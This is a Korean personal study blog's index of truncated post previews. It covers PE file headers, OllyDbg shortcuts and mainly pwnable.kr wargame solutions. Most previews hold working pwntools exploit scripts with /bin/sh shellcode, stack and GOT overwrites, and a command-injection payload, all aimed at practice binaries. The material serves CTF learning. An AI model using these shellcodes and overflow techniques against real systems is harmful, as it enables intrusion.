대충공부한거적어두는블로그

http://www.phreedom.org/research/tinype/ Tiny PE Tiny PE Translations: português brasileiro Creating the smallest possible PE executable This work was inspired by the Tiny PE challenge by Gil Dabah. The object of the challenge was to write the smallest PE file that downloads a file from the Internet and www.phreedom.org [97Byte PE] - IMAGE_DOS_HEADER [0x00 ~ 0x3F] 1) e_magic = "MZ", DOS 시그니쳐 존재 ..

[PE Header 구조] - IMAGE_DOS_HEADER [크기 0x40] 0x0~0x1 : DOS Signature "MZ(4D5A)" 0x3C~0x3F : NT header의 offset - DOS Stub [DOS_HEADER 이후부터 NT header offset 전까지] 0x0~0xD : 16bit DOS용 어셈블리 0xE ~ : 문자열 - IMAGE_NT_HEADERS 1) PE Signature ("PE\x00\x00") [크기 0x4] 2) IMAGE_FILE_HEADER [크기 0x14] 0x0~0x1 : Machine (0x014c: Intel 386, 0x0200: Intel 64) 0x2~0x3 : Number of sections (>0) 0x10~0x11 : Size of O..

명령어 단축키 설명 restart Ctrl + F2 처음부터 다시 디버깅 시작 step into F7 OP 코드 하나 실행, CALL 명령 내부로 step over F8 OP 코드 하나 실행, CALL 명령 넘어감 execute until return Ctrl + F9 함수 코그 내에서 RETN 명령까지 실행 go to Ctrl + G 원하는 주소로 jump execute until cursor F4 커서 위치까지 실행 comment : 코멘트 추가 Search for - User-defined comment label ; 라벨 추가 Search for - User-defined label set/reset bp F2 bp 추가 / 제거 run F9 실행 show current EIP * 현재 EIP 위..

import subprocess subprocess.Popen(["/home/otp/otp", "0"]) otp@pwnable:~$ ulimit -f 0 otp@pwnable:~$ python Python 2.7.12 (default, Mar 1 2021, 11:38:31) [GCC 5.4.0 20160609] on linux2 Type "help", "copyright", "credits" or "license" for more information. >>> import subprocess >>> subprocess.Popen(["./otp", "0"]) #include #include #include #include int main(int argc, char* argv[]){ char fname[12..

from pwn import * # p = process("./dragon") p = remote("pwnable.kr", 9004) def ssc(): # Priest: HolyShield - HolyShield - Clarity # Priest's HP -= 10 , Dragon's HP += 12 p.sendlineafter("Invincible.\n", "3") p.sendlineafter("Invincible.\n", "3") p.sendlineafter("Invincible.\n", "2") # don't attack baby dragon p.sendlineafter("[ 2 ] Knight\n", "1") p.sendlineafter("Invincible.\n", "1") p.sendline..

from pwn import * callme = 0x80485AB # system("/bin/sh") argvs = [p32(callme)*0x1000] env = {} for i in range(0x10): env[str(i)] = p32(callme)*0x7000 size = -80 # -92 ~ -77 stkaddr = 0xffcf5000 # guess stack address while True: p = process(executable="/home/alloca/alloca", env=env, argv=argvs) p.sendline(str(size)) p.sendline("-"+str(0x100000000-stkaddr)) sleep(4) # code 중간중간 sleep(1) 끼어있음, slee..

from pwn import * import base64 p = remote("pwnable.kr", 9003) # p = process("./login") pay = b'\x84\x92\x04\x08\x61\x61\x61\x61\x3c\xeb\x11\x08' pay_encoded = base64.b64encode(pay).decode('ascii') # hJIECGFhYWE86xEI # print(pay_encoded) p.sendlineafter('Authenticate : ', pay_encoded) p.interactive() int __cdecl main(int argc, const char **argv, const char **envp) { char v4; // [esp+4h] [ebp-3Ch..

from pwn import * p = remote("pwnable.kr", 9034) # p = process("./loveletter") # protect에 의해 253bytes+';' => 253bytes+'\xe2\x99\xa5\x00' : 1byte overflow pay = 'cat flag ' pay += 'A'*(253-len(pay)) p.sendline(pay+";") p.interactive() int __cdecl main(int argc, const char **argv, const char **envp) { _BYTE v4[256]; // [esp+10h] [ebp-114h] BYREF int v5; // [esp+110h] [ebp-14h] int v6; // [esp+114h..

from pwn import * p = remote("pwnable.kr", 9011) # p = process("./echo2") e = ELF("./echo2") # shellcode = "\x48\x31\xff\x48\x31\xf6\x48\x31\xd2\x48\x31\xc0\x50\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x48\x89\xe7\xb0\x3b\x0f\x05" shellcode = "\x31\xf6\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x56\x53\x54\x5f\x6a\x3b\x58\x31\xd2\x0f\x05" poprbpret = "\x5d\x5d\xc3" free_got = e.got['free'] # 0x6..

#include // 23byte shellcode from http://shell-storm.org/shellcode/files/shellcode-827.php char sc[] = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69" "\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"; void shellcode(){ // a buffer we are about to exploit! // [ebp-0x1c] char buf[20]; // prepare shellcode on executable stack! strcpy(buf, sc); // overwrite return address! // [ebp+0x4] = buf+32 *(i..